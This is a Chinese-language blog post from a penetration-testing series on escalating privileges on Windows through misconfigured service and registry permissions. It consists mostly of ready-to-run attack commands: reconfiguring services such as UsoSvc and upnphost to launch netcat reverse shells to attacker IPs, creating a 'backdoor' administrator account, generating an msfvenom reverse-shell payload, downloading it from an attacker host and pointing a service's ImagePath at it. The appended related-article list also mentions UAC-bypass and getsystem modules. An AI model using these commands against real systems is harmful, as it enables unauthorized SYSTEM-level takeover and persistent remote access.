WEB渗透Win提权篇-弱权限提权

于 2024-08-26 21:57:53 发布
阅读量259 收藏 1
点赞数 10
分类专栏: 渗透测试 文章标签: 渗透测试 网络安全 WEB安全 WEB渗透 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59468567/article/details/141574358
版权

  提权工具合集包: 夸克网盘分享

 往期文章

WEB渗透Win提权篇-提权工具合集-CSDN博客

WEB渗透Win提权篇-RDP&Firewall-CSDN博客

WEB渗透Win提权篇-MSSQL-CSDN博客

WEB渗透Win提权篇-MYSQL-udf-CSDN博客

WEB渗透Win提权篇-AccountSpoofing-CSDN博客

服务中的不正确权限

CVE-2019-1322 UsoSvc

条件:服务帐号

PS C:\Windows\system32> sc.exe stop UsoSvc
PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe"

PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe"

PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd /C C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"

PS C:\Windows\system32> sc.exe qc usosvc

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: usosvc
        TYPE               : 20  WIN32_SHARE_PROCESS 
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : Update Orchestrator Service
        DEPENDENCIES       : rpcss
        SERVICE_START_NAME : LocalSystem

PS C:\Windows\system32> sc.exe start UsoSvc

upnphost

>sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.73 4343 -e C:\WINDOWS\System32\cmd.exe"

>sc config upnphost obj= ".\LocalSystem" password= ""
>sc qc upnphost
>sc config upnphost depend= ""

>net start upnphost

如果由于缺少依赖项而失败,请尝试以下命令。

>sc config SSDPSRV start=auto
>net start SSDPSRV
>net stop upnphost
>net start upnphost

>sc config upnphost depend=""

使用accesschk

https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe
https://github.com/phackt/pentest/blob/master/privesc/windows/accesschk-XP.exe

>accesschk.exe -uwcqv "Authenticated Users" * /accepteula

RW SSDPSRV
        SERVICE_ALL_ACCESS
RW upnphost
        SERVICE_ALL_ACCESS

>accesschk.exe -ucqv upnphost

upnphost
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\Authenticated Users
        SERVICE_ALL_ACCESS
  RW BUILTIN\Power Users
        SERVICE_ALL_ACCESS

>sc config <vuln-service> binpath="net user backdoor backdoor123 /add"
>sc config <vuln-service> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"

>sc stop <vuln-service>
>sc start <vuln-service>
>sc config <vuln-service> binpath="net localgroup Administrators backdoor /add"
>sc stop <vuln-service>
>sc start <vuln-service>

弱注册表权限

检查有KEY_ALL_ACCESS权限的注册表项

>accesschk.exe /accepteula "authenticated users" -kvuqsw hklm\System\CurrentControlSet\services

查询路径

>reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xxxx

使用powershell查询

>Get-Acl -Path HKLM:\SYSTEM\CurrentControlSet\Services\xxxx | fl

可以看到authenticated users ALLOW FullControl 攻击

>msfvenom –p window/shell_reverse_tcp lhost=192.168.1.3 lport=8888 –f exe > shell.exe
>python –m SimpleHTTPServer 80
>cd c:\Users\public
>powershell wget http://192.168.1.3/shell.exe -o shell.exe
>dir
>reg add "HKLM\system\currentcontrolset\services\xxxx" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Public\shell.exe" /f
>net start pentest

攻击机监听获得system权限会话

>nc -lvp 8888

弱权限的PATH目录

>for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
>for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"

>sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt
>FOR /F %i in (Servicenames.txt) DO echo %i
>type Servicenames.txt
>FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
>FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt

或使用msf模块exploit/windows/local/service_permissions 寻找BUILTIN\Users:(F)(完全访问)、BUILTIN\Users:(M)(修改访问)或 BUILTIN\Users:(W)(只写访问)

Pluto-2003
关注
专栏目录
49-4 内网渗透 - 不安全的服务权限提权
weixin_43263566的博客
06-28 299
例如,下图展示了 phpStudySrv 服务的注册表信息,其中的 ImagePath 键指向该系统服务启动的二进制程序。如果能够让服务在启动时执行其他程序,那么这些程序也将以系统权限运行,这就是利用系统服务进行提权的核心思。,例如不安全的服务权限设置、服务注册表权限不当、服务路径可控制、以及未引用的服务路径等问题。该工具能够枚举目标主机上存在权限缺陷的系统服务,并显示特定用户或组对这些服务的访问权限。如果配置系统服务时存在疏忽,可能会导致低权限用户拥有对高权限系统服务的更改配置权限
权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC
xiaoheizi的博客
08-30 1460
进程迁移注入提权就是将获取到权限低的进程注入至进程中权限高的中,这样就实现了权限提升,同时注入进程提权相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现。操作数据库的权限,数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。原理:把我的进程注入到一个现有的system账号运行的进程中,这样我的进程也就具有了system账号的权限了。程序路径:Potato/source/Potato/Potato/bin/Release/Potato.exe。
渗透测试 提权
07-18
本文档描述了渗透提权的基本套路
渗透测试提权
Forget_liu的博客
05-06 500
主要针对网站测试过程中,当测试某一网站时,通过各种漏洞提升webshell权限来拿到该服务器的权限。此时已经获得了站点的webshell权限提权后获得服务器权限,就可以对站点B,C进行操作。
渗透测试-提权
分享学习网络的点点滴滴
06-09 119
Keylogger木马窃取密码窃取 使用wce去修改用户 首先我们看系统有两个用户,现在我们把sbz改成administrator
渗透测试笔记】之【提权
AA8j的博客
06-03 531
操作系统默认用户 Windows User Administrator System Linux User Root Windows USER->System WinXP、03 at 10:11 /intertractive cmd Win7、8 sc Create syscmd binPath="cmd /K start" type=own type=interact sc start syscmd 利用开发工具 首先下载微软开发工具包:https://download.sysin
渗透测试框架提权
weixin_43873557的博客
02-10 168
01 Metasploit提权模块 ➢ Meterpreter自动提权命令 getsystem getuid ➢ 提权命令执行失败,绕过uac use exploit/windows/local/bypassuac set payload windows/meterpreter/reverse_tcp set LHOST=192.168.1.170 set session 1 exploit use exploit/windows/local/bypassuac_injection set payloa
Windows提权--小迪权限提升--烂土豆--DLL劫持--udf提权
z2560088的博客
02-13 4366
针对环境 windows有两种环境,一种是web网站拿到的webshell环境,一般是低权限的用户,(jsp除外,拿到webshell就是system权限)另一种是本地的环境,可能是服务器为管理某项服务创建的低权限用户。不同环境下的操作会有所不同。 提权方法 1.win溢出漏洞(如何判断类型和利用) 信息收集-补丁筛选-利用 MSF 或特定 EXP-执行-西瓜到手 Vulmap,Wes,WindowsVulnScan 对比,exp 在哪里获取? 利用wes进行补丁筛选 2.数据库提权 ...
116.网络安全渗透测试—[权限提升14]—[Windows 2003 Metasploit提权&权限维持&开启3389]
qwsn
07-08 2593
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 【图略】#键入 启动 metasploit #进入监听模块 #查看系统信息 #查看进程 pid #迁移进程 #当前用户
103.网络安全渗透测试—[权限提升1]—[Linux内核漏洞提权]
qwsn
02-15 7259
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、LINUX 内核漏洞提权 1、漏洞背景: 2、漏洞利用: (1)实验环境 (2)靶机链接 (3)突破MIME类型限制文件上传获取webshell (4)创建交互式shell (5)查看linux发行版 (6)查找可用的提权exp (7)进行提权 (8)切换shell
渗透测试——权限提升
世间繁华梦一出
03-01 1794
提权一、什么是提权二、怎样进行提权提权的方式有哪些)1、系统漏洞提权(Linux、Windows) 一、什么是提权 提权就是通过各种办法和漏洞,提升自己在服务器中的权限,以便控制全局。 windows:User >> System linux: User >> Root 二、怎样进行提权提权的方式有哪些) 1、系统漏洞提权(Linux、Windows) 2、数据库提权 3、系统配置错误提权 4、权限继承类提权 5、第三方软件/服务提权 6、WebServer漏洞提权 1、系统
渗透测试技术----提权(本地提权)
wwl012345的博客
07-22 2873
一、开启Kali共享文件夹(拓展,与提权无关) 1.对于很多使用虚拟机的朋友来说,最头疼的就是无法把物理机上的文件移动到虚拟机上,这有两种方法,一种是安装Vmtools软件,还有一种就是开启共享文件夹。方法如下 虚拟机–>设置–>选项–>共享文件夹–>总是启用–>添加–>选择在物理机上建立的文件夹(这一步很重要,如果没有连接到物理机上的共享文件夹,那么相当于没...
渗透测试提权指南
遇事不决冲冲冲
12-04 7529
windows系统提权 参考内网安全攻防:渗透测试实战指南(百度百科) 一.系统内核漏洞 利用已存在未安装补丁的漏洞进行提权 参考Windows系统内核溢出漏洞提权 1.手动寻找缺失补丁 拿到权限后通过如下命令查看系统安装了哪些补丁 systeminfo wmic qfe get caption,description,hotfixid,installedon 比CMD更强大的命令行:WMIC后渗透利用(系统命令) 通过没有列出的补丁号,寻找相应的提权EXP进行提权(挺离谱的感觉) 系统漏洞与对应的
108.网络安全渗透测试—[权限提升6]—[Windows内核溢出提权]
qwsn
07-04 2686
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! window 服务器常用的是win2003、win2008和win2012。在渗透测试中 ,我们获取的权限是iis_user用户组 ,要更高的权限就需要把当前的用户提权到系统用户或超级管理员用户组。更高的权限方便我们在后续的渗透中,扩大范围测试。 在iis里面,权限依次的大小对比:,aspx默认能执行终端命令、php和asp如果不能执行命令,在wscript.shell组件没有删除的情况下,可以上传c
渗透测试——提权方式总结
热门推荐
橘子女侠
06-11 3万+
(内容整理自网络) 一、 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进行提权提权的方式有哪些) 1.、系统漏洞提权(Linux、Windows) 2、数据库提权 3、系统配置错误提权 4、权限继承类提权 5、第三方软件...
渗透测试提权方式总结
qq_29864185的博客
07-06 2092
目录 一、 什么是提权 二、怎样进行提权提权的方式有哪些) 1、系统漏洞提权 (1)Windows提权 (2)Linux系统提权 2、数据库提权 (1)MySQL数据库提权 3、系统配置不当提权 4、权限继承类提权 5、第三方软件/服务提权6、WebServer漏洞提权 一、 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进
提权方式及原理简介(面试)
jklbnm12的博客
02-21 2409
一、提权 想了解原理首先要明白什么叫提权,为什么要提权,通常获取到Shell之后,假如我们拿到的是普通权限比如mysql、tomcat等普通应用权限,那我们如果想在内网畅通无阻,那肯定第一步需要获取到管理员最起码要是administrator甚至是system。 这种获取最高权限的方式就叫提权。 二、提权方式 1、系统本地漏洞提权 2、数据库提权 3、第三方软件提权 4、获取高权限用户比如msf的getsystem提权等 三、分类 Windows提权 Windows提权一般为系统漏洞提权, wmic qf
渗透测试提权-Liinux权限提升
最新发布
LCW991207的博客
09-24 653
呕心沥血6个小时写成:非漏洞提权(suid,sudo,NFS,PATH,LD_PRELOAD,Cron,DOCKER,LXD)漏洞提权(Linux内核提权漏洞)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pluto-2003

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值